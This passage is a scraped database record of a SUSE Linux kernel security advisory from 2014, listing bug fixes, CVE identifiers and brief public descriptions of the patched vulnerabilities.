remove useless check about mapping type\n * mm, hugetlb: return a reserved page to a reserved pool if failed\n * mm, hugetlb: trivial commenting fix\n * mm, hugetlb: unify region structure handling\n * mm, hugetlb: unify region structure handling kabi\n * mm, hugetlb: use long vars instead of int in region_count() (Hugetlb\n Fault Scalability).\n * mm, hugetlb: use vma_resv_map() map types\n * mm, oom: fix badness score underflow (bnc#884582, bnc#884767).\n * mm, oom: normalize oom scores to oom_score_adj scale only for\n userspace (bnc#884582, bnc#884767).\n * mm, thp: do not allow thp faults to avoid cpuset restrictions\n (bnc#888849).\n * net/mlx4_core: Load higher level modules according to ports type\n (bnc#887680).\n * net/mlx4_core: Load the IB driver when the device supports IBoE\n (bnc#887680).\n * net/mlx4_en: Fix a race between napi poll function and RX ring\n cleanup (bnc#863586).\n * net/mlx4_en: Fix selftest failing on non 10G link speed (bnc#888058).\n * net: fix checksumming features handling in output path (bnc#891259).\n * pagecache_limit: batch large nr_to_scan targets (bnc#895221).\n * pagecachelimit: reduce lru_lock congestion for heavy parallel\n reclaim fix (bnc#895680).\n * perf/core: Add weighted samples (bnc#876114).\n * perf/x86: Add flags to event constraints (bnc#876114).\n * perf/x86: Add memory profiling via PEBS Load Latency (bnc#876114).\n * perf: Add generic memory sampling interface (bnc#876114).\n * qla2xxx: Avoid escalating the SCSI error handler if the command is\n not found in firmware (bnc#859840).\n * qla2xxx: Clear loop_id for ports that are marked lost during fabric\n scanning (bnc#859840).\n * qla2xxx: Does not check for firmware hung during the reset context\n for ISP82XX (bnc#859840).\n * qla2xxx: Issue abort command for outstanding commands during cleanup\n when only firmware is alive (bnc#859840).\n * qla2xxx: Reduce the time we wait for a command to complete during\n SCSI error handling (bnc#859840).\n * qla2xxx: Set host can_queue value based on available resources\n (bnc#859840).\n * restore smp_mb() in unlock_new_inode() (bnc#890526).\n * s390/pci: introduce lazy IOTLB flushing for DMA unmap (bnc#889061,\n LTC#113725).\n * sched: fix the theoretical signal_wake_up() vs schedule() race\n (bnc#876055).\n * sclp_vt220: Enable integrated ASCII console per default (bnc#885262,\n LTC#112035).\n * scsi_dh: use missing accessor "scsi_device_from_queue" (bnc#889614).\n * scsi_transport_fc: Cap dev_loss_tmo by fast_io_fail (bnc#887608).\n * scsiback: correct grant page unmapping.\n * scsiback: fix retry handling in __report_luns().\n * scsiback: free resources after error.\n * sunrpc/auth: allow lockless (rcu) lookup of credential cache\n (bnc#866130).\n * supported.conf: remove external from drivers/net/veth (bnc#889727)\n * supported.conf: support net/sched/act_police.ko (bnc#890426)\n * tcp: adapt selected parts of RFC 5682 and PRR logic (bnc#879921).\n * tg3: Change nvram command timeout value to 50ms (bnc#855657).\n * tg3: Override clock, link aware and link idle mode during NVRAM dump\n (bnc#855657).\n * tg3: Set the MAC clock to the fastest speed during boot code load\n (bnc#855657).\n * usb: Does not enable LPM if the exit latency is zero (bnc#832309).\n * usbcore: Does not log on consecutive debounce failures of the same\n port (bnc#888105).\n * usbhid: fix PIXART optical mouse (bnc#888607).\n * uswsusp: Disable when module loading is restricted (bnc#884333).\n * vscsi: support larger transfer sizes (bnc#774818).\n * writeback: Do not sync data dirtied after sync start (bnc#833820).\n * x86 thermal: Delete power-limit-notification console messages\n (bnc#882317).\n * x86 thermal: Disable power limit notification interrupt by default\n (bnc#882317).\n * x86 thermal: Re-enable power limit notification interrupt by default\n (bnc#882317).\n * x86, cpu hotplug: Fix stack frame warning in\n check_irq_vectors_for_cpu_disable() (bnc#887418).\n * x86/UV: Add call to KGDB/KDB from NMI handler (bnc#888847).\n * x86/UV: Add kdump to UV NMI handler (bnc#888847).\n * x86/UV: Add summary of cpu activity to UV NMI handler (bnc#888847).\n * x86/UV: Move NMI support (bnc#888847).\n * x86/UV: Update UV support for external NMI signals (bnc#888847).\n * x86/uv/nmi: Fix Sparse warnings (bnc#888847).\n * x86: Add check for number of available vectors before CPU down\n (bnc#887418).\n * x86: Lock down IO port access when module security is enabled\n (bnc#884333).\n * x86: Restrict MSR access when module loading is restricted\n (bnc#884333).\n\n Security Issues:\n\n * CVE-2013-1979\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979</a>>\n * CVE-2014-1739\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739</a>>\n * CVE-2014-2706\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706</a>>\n * CVE-2014-4027\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027</a>>\n * CVE-2014-4171\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171</a>>\n * CVE-2014-4508\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508</a>>\n * CVE-2014-4667\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667</a>>\n * CVE-2014-4943\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943</a>>\n * CVE-2014-5077\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077</a>>\n * CVE-2014-5471\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471</a>>\n * CVE-2014-5472\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472</a>>\n * CVE-2014-3153\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153</a>>\n * CVE-2014-6410\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6410\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6410</a>>\n\n The SUSE Linux Enterprise 11 Service Pack 3 RealTime Extension kernel was\n updated to fix various bugs and security issues.\n\n Following security bugs were fixed: CVE-2013-1979: The scm_set_cred\n function in include/net/scm.h in the Linux kernel before 3.8.11 uses\n incorrect uid and gid values during credentials passing, which allows\n local users to gain privileges via a crafted application (bnc#816708).\n\n CVE-2014-1739: The media_device_enum_entities function in\n drivers/media/media-device.c in the Linux kernel before 3.14.6 does not\n initialize a certain data structure, which allows local users to obtain\n sensitive information from kernel memory by leveraging /dev/media0 read\n access for a MEDIA_IOC_ENUM_ENTITIES ioctl call (bnc#882804).\n\n CVE-2014-4171: mm/shmem.c in the Linux kernel through 3.15.1 does not\n properly implement the interaction between range notification and hole\n punching, which allows local users to cause a denial of service (i_mutex\n hold) by using the mmap system call to access a hole, as demonstrated by\n interfering with intended shmem activity by blocking completion of (1) an\n MADV_REMOVE madvise call or (2) an FALLOC_FL_PUNCH_HOLE fallocate call\n (bnc#883518).\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel through\n 3.15.1 on 32-bit x86 platforms, when syscall auditing is enabled and the\n sep CPU feature flag is set, allows local users to cause a denial of\n service (OOPS and system crash) via an invalid syscall number, as\n demonstrated by number 1000 (bnc#883724).\n\n CVE-2014-4667: The sctp_association_free function in net/sctp/associola.c\n in the Linux kernel before 3.15.2 does not properly manage a certain\n backlog value, which allows remote attackers to cause a denial of service\n (socket outage) via a crafted SCTP packet (bnc#885422).\n\n CVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux\n kernel through 3.15.6 allows local users to gain privileges by leveraging\n data-structure differences between an l2tp socket and an inet socket\n (bnc#887082).\n\n CVE-2014-5077: The sctp_assoc_update function in net/sctp/associola.c in\n the Linux kernel through 3.15.8, when SCTP authentication is enabled,\n allows remote attackers to cause a denial of service (NULL pointer\n dereference and OOPS) by starting to establish an association between two\n endpoints immediately after an exchange of INIT and INIT ACK chunks to\n establish an earlier association between these endpoints in the opposite\n direction (bnc#889173).\n\n CVE-2014-5471: Stack consumption vulnerability in the\n parse_rock_ridge_inode_internal function in fs/isofs/rock.c in the Linux\n kernel through 3.16.1 allows local users to cause a denial of service\n (uncontrolled recursion, and system crash or reboot) via a crafted iso9660\n image with a CL entry referring to a directory entry that has a CL entry.\n (bnc#892490)\n\n CVE-2014-5472: The parse_rock_ridge_inode_internal function in\n fs/isofs/rock.c in the Linux kernel through 3.16.1 allows local users to\n cause a denial of service (unkillable mount process) via a crafted iso9660\n image with a self-referential CL entry. (bnc#892490)\n\n CVE-2014-2706: Race condition in the mac80211 subsystem in the Linux\n kernel before 3.13.7 allows remote attackers to cause a denial of service\n (system crash) via network traffic that improperly interacts with the\n WLAN_STA_PS_STA state (aka power-save mode), related to sta_info.c and\n tx.c. (bnc#871797)\n\n CVE-2014-4027: The rd_build_device_space function in\n drivers/target/target_core_rd.c in the Linux kernel before 3.14 does not\n properly initialize a certain data structure, which allows local users to\n obtain sensitive information from ramdisk_mcp memory by leveraging access\n to a SCSI initiator. (bnc#882639)\n\n CVE-2014-3153 The futex_requeue function in kernel/futex.c in the Linux\n kernel through 3.14.5 does not ensure that calls have two different futex\n addresses, which allows local users to gain privileges via a crafted\n FUTEX_REQUEUE command that facilitates unsafe waiter modification.\n (bnc#880892)\n\n CVE-2014-6410: Avoid infinite loop when processing indirect ICBs\n (bnc#896689)\n\n The following non-security bugs were fixed: - ACPI / PAD: call schedule()\n when need_resched() is true (bnc#866911). - ACPI: Fix bug when ACPI reset\n register is implemented in system memory (bnc#882900). - ACPI: Limit\n access to custom_method (bnc#884333). - ALSA: hda - Enabling Realtek ALC\n 671 codec (bnc#891746). - Add option to automatically enforce module\n signatures when in Secure Boot mode (bnc#884333). - Add secure_modules()\n call (bnc#884333).\n - Add wait_on_atomic_t() and wake_up_atomic_t() (bnc#880344). - Backported\n new patches of Lock down functions for UEFI secure boot Also updated\n series.conf and removed old patches. - Btrfs: Return EXDEV for cross\n file system snapshot. - Btrfs: abort the transaction when we does not\n find our extent ref. - Btrfs: avoid warning bomb of\n btrfs_invalidate_inodes. - Btrfs: cancel scrub on transaction abortion.\n - Btrfs: correctly set profile flags on seqlock retry. - Btrfs: does not\n check nodes for extent items. - Btrfs: fix a possible deadlock between\n scrub and transaction committing. - Btrfs: fix corruption after\n write/fsync failure + fsync + log recovery (bnc#894200). - Btrfs: fix\n csum tree corruption, duplicate and outdated checksums (bnc#891619). -\n Btrfs: fix double free in find_lock_delalloc_range. - Btrfs: fix\n possible memory leak in btrfs_create_tree(). - Btrfs: fix use of uninit\n "ret" in end_extent_writepage(). - Btrfs: free delayed node outside of\n root->inode_lock (bnc#866864). - Btrfs: make DEV_INFO ioctl available to\n anyone. - Btrfs: make FS_INFO ioctl available to anyone. - Btrfs: make\n device scan less noisy. - Btrfs: make sure there are not any read\n requests before stopping workers. - Btrfs: more efficient io tree\n navigation on wait_extent_bit. - Btrfs: output warning instead of error\n when loading free space cache failed. - Btrfs: retrieve more info from\n FS_INFO ioctl. - Btrfs: return EPERM when deleting a default subvolume\n (bnc#869934). - Btrfs: unset DCACHE_DISCONNECTED when mounting default\n subvol (bnc#866615).\n - Btrfs: use right type to get real comparison. - Btrfs: wake up\n @scrub_pause_wait as much as we can. - Btrfs: wake up transaction thread\n upon remount. - CacheFiles: Add missing retrieval completions\n (bnc#880344).\n - CacheFiles: Does not try to dump the index key if the cookie has been\n cleared (bnc#880344). - CacheFiles: Downgrade the requirements passed to\n the allocator (bnc#880344). - CacheFiles: Fix the marking of cached\n pages (bnc#880344). - CacheFiles: Implement invalidation (bnc#880344). -\n CacheFiles: Make some debugging statements conditional (bnc#880344). -\n Drivers: hv: util: Fix a bug in the KVP code (bnc#886840). - Drivers:\n hv: vmbus: Fix a bug in the channel callback dispatch code (bnc#886840).\n - FS-Cache: Add transition to handle invalidate immediately after lookup\n (bnc#880344). - FS-Cache: Check that there are no read ops when cookie\n relinquished (bnc#880344). - FS-Cache: Clear remaining page count on\n retrieval cancellation (bnc#880344). - FS-Cache: Convert the object\n event ID #defines into an enum (bnc#880344). - FS-Cache: Does not sleep\n in page release if __GFP_FS is not set (bnc#880344). - FS-Cache: Does\n not use spin_is_locked() in assertions (bnc#880344). - FS-Cache:\n Exclusive op submission can BUG if there is been an I/O error\n (bnc#880344). - FS-Cache: Fix __wait_on_atomic_t() to call the action\n func if the counter != 0 (bnc#880344). - FS-Cache: Fix object state\n machine to have separate work and wait states (bnc#880344). - FS-Cache:\n Fix operation state management and accounting (bnc#880344). - FS-Cache:\n Fix signal handling during waits (bnc#880344). - FS-Cache: Initialise\n the object event mask with the calculated mask (bnc#880344). - FS-Cache:\n Limit the number of I/O error reports for a cache (bnc#880344). -\n FS-Cache: Make cookie relinquishment wait for outstanding reads\n (bnc#880344). - FS-Cache: Mark cancellation of in-progress operation\n (bnc#880344). - FS-Cache: One of the write operation paths doeses not\n set the object state (bnc#880344). - FS-Cache: Provide proper\n invalidation (bnc#880344). - FS-Cache: Simplify cookie retention for\n fscache_objects, fixing oops (bnc#880344). - FS-Cache: The retrieval\n remaining-pages counter needs to be atomic_t (bnc#880344). - FS-Cache:\n Uninline fscache_object_init() (bnc#880344). - FS-Cache: Wrap checks on\n object state (bnc#880344). - HID: usbhid: add always-poll quirk\n (bnc#888607). - HID: usbhid: enable always-poll quirk for Elan\n Touchscreen (bnc#888607). - IB/iser: Add TIMEWAIT_EXIT event handling\n (bnc#890297). - Ignore "flags" change to event_constraint (bnc#876114). -\n Ignore data_src/weight changes to perf_sample_data (bnc#876114). - NFS:\n Allow more\n operations in an NFSv4.1 request (bnc#890513). - NFS: Clean up helper\n function nfs4_select_rw_stateid() (bnc#888968). - NFS: Does not copy read\n delegation stateids in setattr (bnc#888968). - NFS: Does not use a\n delegation to open a file when returning that delegation (bnc#888968,\n bnc#892200, bnc#893596, bnc#893496) - NFS: Fixes for NFS RCU-walk support\n in line with code going upstream - NFS: Use FS-Cache invalidation\n (bnc#880344). - NFS: allow lockless access to access_cache (bnc#866130).\n - NFS: avoid mountpoint being displayed as " (deleted)" in /proc/mounts\n (bnc#888591). - NFS: nfs4_do_open should add negative results to the\n dcache (bnc#866130). - NFS: nfs_migrate_page() does not wait for FS-Cache\n to finish with a page (bnc#880344). - NFS: nfs_open_revalidate: only\n evaluate parent if it will be used (bnc#866130). - NFS: prepare for\n RCU-walk support but pushing tests later in code (bnc#866130). - NFS:\n support RCU_WALK in nfs_permission() (bnc#866130). - NFS: teach\n nfs_lookup_verify_inode to handle LOOKUP_RCU (bnc#866130). - NFS: teach\n nfs_neg_need_reval to understand LOOKUP_RCU (bnc#866130). - NFSD: Does\n not hand out delegations for 30 seconds after recalling them\n (bnc#880370). - NFSv4 set open access\n operation call flag in nfs4_init_opendata_res (bnc#888968, bnc#892200,\n bnc#893596, bnc#893496). - NFSv4: Add a helper for encoding opaque data\n (bnc#888968). - NFSv4: Add a helper for encoding stateids (bnc#888968). -\n NFSv4: Add helpers for basic copying of stateids (bnc#888968). - NFSv4:\n Clean up nfs4_select_rw_stateid() (bnc#888968). - NFSv4: Fix the return\n value of nfs4_select_rw_stateid (bnc#888968). - NFSv4: Rename\n nfs4_copy_stateid() (bnc#888968). - NFSv4: Resend the READ/WRITE RPC call\n if a stateid change causes an error (bnc#888968). - NFSv4: Simplify the\n struct nfs4_stateid (bnc#888968). - NFSv4: The stateid must remain the\n same for replayed RPC calls (bnc#888968). - NFSv4:\n nfs4_stateid_is_current should return "true" for an invalid stateid\n (bnc#888968). - One more fix for kABI breakage. - PCI: Lock down BAR\n access when module security is enabled (bnc#884333). - PCI: enable MPS\n "performance" setting to properly handle bridge MPS (bnc#883376). - PM /\n Hibernate: Add memory_rtree_find_bit function (bnc#860441). - PM /\n Hibernate: Create a Radix-Tree to store memory bitmap (bnc#860441). - PM\n / Hibernate: Implement position keeping in radix tree (bnc#860441). - PM\n / Hibernate: Iterate over set bits instead of PFNs in swsusp_free()\n (bnc#860441). - PM / Hibernate: Remove the old memory-bitmap\n implementation (bnc#860441). - PM / Hibernate: Touch Soft Lockup Watchdog\n in rtree_next_node (bnc#860441). - Restrict /dev/mem and /dev/kmem when\n module loading is restricted (bnc#884333). - Reuse existing "state" field\n to indicate PERF_X86_EVENT_PEBS_LDLAT (bnc#876114). - USB: handle LPM\n errors during device suspend correctly (bnc#849123). - Update kabi files\n to reflect fscache change (bnc#880344) - Update x86_64 config files:\n re-enable SENSORS_W83627EHF (bnc#891281) - VFS: Make more complete\n truncate operation available to CacheFiles (bnc#880344). - [FEAT NET1222]\n ib_uverbs: Allow explicit mmio trigger (FATE#83366, ltc#83367). - acpi:\n Ignore acpi_rsdp kernel parameter when module loading is restricted\n (bnc#884333). - af_iucv: correct cleanup if listen backlog is full\n (bnc#885262, LTC#111728). - asus-wmi: Restrict debugfs interface when\n module loading is restricted (bnc#884333). - autofs4: allow RCU-walk to\n walk through autofs4 (bnc#866130). - autofs4: avoid taking fs_lock during\n rcu-walk (bnc#866130). - autofs4: does not take spinlock when not needed\n in autofs4_lookup_expiring (bnc#866130). - autofs4: factor\n should_expire() out\n of autofs4_expire_indirect (bnc#866130). - autofs4: make\n "autofs4_can_expire" idempotent (bnc#866130). - autofs4: remove a\n redundant assignment (bnc#866130). - autofs: fix lockref lookup\n (bnc#888591). - be2net: add dma_mapping_error() check for dma_map_page()\n (bnc#881759). - block: add cond_resched() to potentially long running\n ioctl discard loop (bnc#884725). - block: fix race between request\n completion and timeout handling (bnc#881051). - cdc-ether: clean packet\n filter upon probe (bnc#876017). - cpuset: Fix memory allocator deadlock\n (bnc#876590). - crypto: Allow CRYPTO_FIPS without MODULE_SIGNATURES. Not\n all archs have them, but some are FIPS certified, with some kernel\n support. - crypto: fips\n - only panic on bad/missing crypto mod signatures (bnc#887503). - crypto:\n testmgr - allow aesni-intel and ghash_clmulni-intel in fips mode\n (bnc#889451). - dasd: validate request size before building CCW/TCW\n (bnc#891087, LTC#114068). - dm mpath: fix race condition between\n multipath_dtr and pg_init_done (bnc#826486). - dm-mpath: fix panic on\n deleting sg device (bnc#870161). - drm/ast: AST2000 cannot be detected\n correctly (bnc#895983). - drm/ast: Actually load DP501 firmware when\n required (bnc#895608 bnc#871134). - drm/ast: Add missing entry to\n dclk_table[]. - drm/ast: Add reduced non reduced mode parsing for wide\n screen mode (bnc#892723). - drm/ast: initial DP501 support (v0.2)\n (bnc#871134). - drm/ast: open key before detect chips (bnc#895983). -\n drm/i915: Fix up cpt pixel multiplier enable sequence (bnc#879304). -\n drm/i915: Only apply DPMS to the encoder if enabled (bnc#893064). -\n drm/i915: clear the FPGA_DBG_RM_NOCLAIM bit at driver init (bnc#869055).\n - drm/i915: create functions for the "unclaimed register" checks\n (bnc#869055). - drm/i915: use FPGA_DBG for the "unclaimed register"\n checks (bnc#869055). - drm/mgag200: Initialize data needed to map fbdev\n memory (bnc #806990). - e1000e: enable support for new device IDs\n (bnc#885509). - fs/fscache: remove spin_lock() from the condition in\n while() (bnc#880344).\n - hibernate: Disable in a signed modules environment (bnc#884333). -\n hugetlb: does not use ERR_PTR with VM_FAULT* values - ibmvscsi: Abort\n init sequence during error recovery (bnc#885382). - ibmvscsi: Add memory\n barriers for send / receive (bnc#885382). - inet: add a redirect\n generation id in inetpeer (bnc#860593). - inetpeer: initialize\n ->redirect_genid in inet_getpeer() (bnc#860593). - ipv6: tcp: fix\n tcp_v6_conn_request() (bnc#887645). - kabi: hide bnc#860593 changes of\n struct inetpeer_addr_base (bnc#860593). - kernel: 3215 tty hang\n (bnc#891087, LTC#114562). - kernel: fix data corruption when reading\n /proc/sysinfo (bnc#891087, LTC#114480). - kernel: fix kernel oops with\n load of fpc register (bnc#889061, LTC#113596).\n - kernel: sclp console tty reference counting (bnc#891087, LTC#115466). -\n kexec: Disable at runtime if the kernel enforces module loading\n restrictions (bnc#884333). - md/raid6: avoid data corruption during\n recovery of double-degraded RAID6. - memcg, vmscan: Fix forced scan of\n anonymous pages (memory reclaim fix). - memcg: do not expose\n uninitialized mem_cgroup_per_node to world (bnc#883096). - mm, hugetlb:\n add VM_NORESERVE check in vma_has_reserves() - mm, hugetlb: change\n variable name reservations to resv - mm, hugetlb: decrement reserve\n count if VM_NORESERVE alloc page cache - mm, hugetlb: defer freeing\n pages when gathering surplus pages - mm, hugetlb: do not use a page in\n page cache for cow optimization - mm, hugetlb: fix and clean-up node\n iteration code to alloc or free - mm, hugetlb: fix race in region\n tracking - mm, hugetlb: fix subpool accounting handling - mm, hugetlb:\n improve page-fault scalability - mm, hugetlb: improve, cleanup resv_map\n parameters - mm, hugetlb: move up the code which check availability of\n free huge page - mm, hugetlb: protect reserved pages when soft offlining\n a hugepage - mm, hugetlb: remove decrement_hugepage_resv_vma() - mm,\n hugetlb: remove redundant list_empty check in gather_surplus_pages() -\n mm, hugetlb: remove resv_map_put - mm, hugetlb: remove useless check\n about mapping type - mm, hugetlb: return a reserved page to a reserved\n pool if failed - mm, hugetlb: trivial commenting fix - mm, hugetlb:\n unify region structure handling - mm, hugetlb: unify region structure\n handling kabi - mm, hugetlb: use long vars instead of int in\n region_count() (Hugetlb Fault Scalability). - mm, hugetlb: use\n vma_resv_map() map types - mm, oom: fix badness score underflow\n (bnc#884582, bnc#884767). - mm, oom: normalize oom scores to\n oom_score_adj scale only for userspace (bnc#884582, bnc#884767). - mm,\n thp: do not allow thp faults to avoid cpuset restrictions (bnc#888849). -\n net/mlx4_core: Load higher level modules according to ports type\n (bnc#887680). - net/mlx4_core: Load the IB driver when the device\n supports IBoE (bnc#887680). - net/mlx4_en: Fix a race between napi poll\n function and RX ring cleanup (bnc#863586). - net/mlx4_en: Fix selftest\n failing on non 10G link speed (bnc#888058). - net: fix checksumming\n features handling in\n output path (bnc#891259). - pagecache_limit: batch large nr_to_scan\n targets (bnc#895221). - pagecachelimit: reduce lru_lock congestion for\n heavy parallel reclaim fix (bnc#895680). - perf/core: Add weighted\n samples (bnc#876114). - perf/x86: Add flags to event constraints\n (bnc#876114). - perf/x86: Add memory profiling via PEBS Load Latency\n (bnc#876114). - perf: Add generic memory sampling interface (bnc#876114).\n - qla2xxx: Avoid escalating the SCSI error handler if the command is not\n found in firmware (bnc#859840). - qla2xxx: Clear loop_id for ports that\n are marked lost during fabric scanning (bnc#859840). - qla2xxx: Does not\n check for firmware hung during the reset context for ISP82XX\n (bnc#859840). - qla2xxx: Issue abort command for outstanding commands\n during cleanup when only firmware is alive (bnc#859840). - qla2xxx:\n Reduce the time we wait for a command to complete during SCSI error\n handling (bnc#859840). - qla2xxx: Set host can_queue value based on\n available resources (bnc#859840). - restore smp_mb() in\n unlock_new_inode() (bnc#890526). - s390/pci: introduce lazy IOTLB\n flushing for DMA unmap (bnc#889061, LTC#113725). - sched: fix the\n theoretical signal_wake_up() vs schedule() race (bnc#876055). -\n sclp_vt220: Enable integrated ASCII console per default (bnc#885262,\n LTC#112035). - scsi_dh: use missing accessor "scsi_device_from_queue"\n (bnc#889614). - scsi_transport_fc: Cap dev_loss_tmo by fast_io_fail\n (bnc#887608). - scsiback: correct grant page unmapping. - scsiback: fix\n retry handling in __report_luns(). - scsiback: free resources after\n error. - sunrpc/auth: allow lockless (rcu) lookup of credential cache\n (bnc#866130). - supported.conf: remove external from drivers/net/veth\n (bnc#889727) - supported.conf: support net/sched/act_police.ko\n (bnc#890426) - tcp: adapt selected parts of RFC 5682 and PRR logic\n (bnc#879921). - tg3: Change nvram command timeout value to 50ms\n (bnc#855657). - tg3: Override clock, link aware and link idle mode during\n NVRAM dump (bnc#855657). - tg3: Set the MAC clock to the fastest speed\n during boot code load (bnc#855657). - usb: Does not enable LPM if the\n exit latency is zero (bnc#832309). - usbcore: Does not log on consecutive\n debounce failures of the same port (bnc#888105). - usbhid: fix PIXART\n optical mouse (bnc#888607). - uswsusp: Disable when module loading is\n restricted (bnc#884333). - vscsi: support larger transfer sizes\n (bnc#774818). - writeback: Do not sync data dirtied after sync start\n (bnc#833820). - x86 thermal: Delete power-limit-notification console\n messages (bnc#882317). - x86 thermal: Disable power limit notification\n interrupt by default (bnc#882317). - x86 thermal: Re-enable power limit\n notification interrupt by default (bnc#882317). - x86, cpu hotplug: Fix\n stack frame warning in check_irq_vectors_for_cpu_disable() (bnc#887418).\n - x86/UV: Add call to KGDB/KDB from NMI handler (bnc#888847). - x86/UV:\n Add kdump to UV NMI handler (bnc#888847). - x86/UV: Add summary of cpu\n activity to UV NMI handler (bnc#888847). - x86/UV: Move NMI support\n (bnc#888847). - x86/UV: Update UV support for external NMI signals\n (bnc#888847). - x86/uv/nmi: Fix Sparse warnings (bnc#888847). - x86: Add\n check for number\n of available vectors before CPU down (bnc#887418). - x86: Lock down IO\n port access when module security is enabled (bnc#884333). - x86: Restrict\n MSR access when module loading is restricted (bnc#884333).\n\n Security Issues:\n\n * CVE-2013-1979\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979</a>>\n * CVE-2014-1739\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739</a>>\n * CVE-2014-2706\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706</a>>\n * CVE-2014-4027\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027</a>>\n * CVE-2014-4171\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171</a>>\n * CVE-2014-4508\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508</a>>\n * CVE-2014-4667\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667</a>>\n * CVE-2014-4943\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943</a>>\n * CVE-2014-5077\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077</a>>\n * CVE-2014-5471\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471</a>>\n * CVE-2014-5472\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472</a>>\n * CVE-2014-3153\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153</a>>\n * CVE-2014-6410\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6410\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6410</a>>\n", "edition": 1, "reporter": "Suse", "published": "2014-10-23T01:08:35", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "suse", "title": "Security update for Linux kernel (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5077", "CVE-2014-1739", "CVE-2014-4508", "CVE-2014-4943", "CVE-2014-4171", "CVE-2014-5472", "CVE-2014-4027", "CVE-2013-1979", "CVE-2014-3153", "CVE-2014-6410", "CVE-2014-5471", "CVE-2014-4667", "CVE-2014-2706"], "modified": "2014-10-23T01:08:35", "id": "SUSE-SU-2014:1319-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00007.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:26:04", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=866911", "https://bugzilla.suse.com/show_bug.cgi?id=891087", "https://bugzilla.suse.com/show_bug.cgi?id=855657", 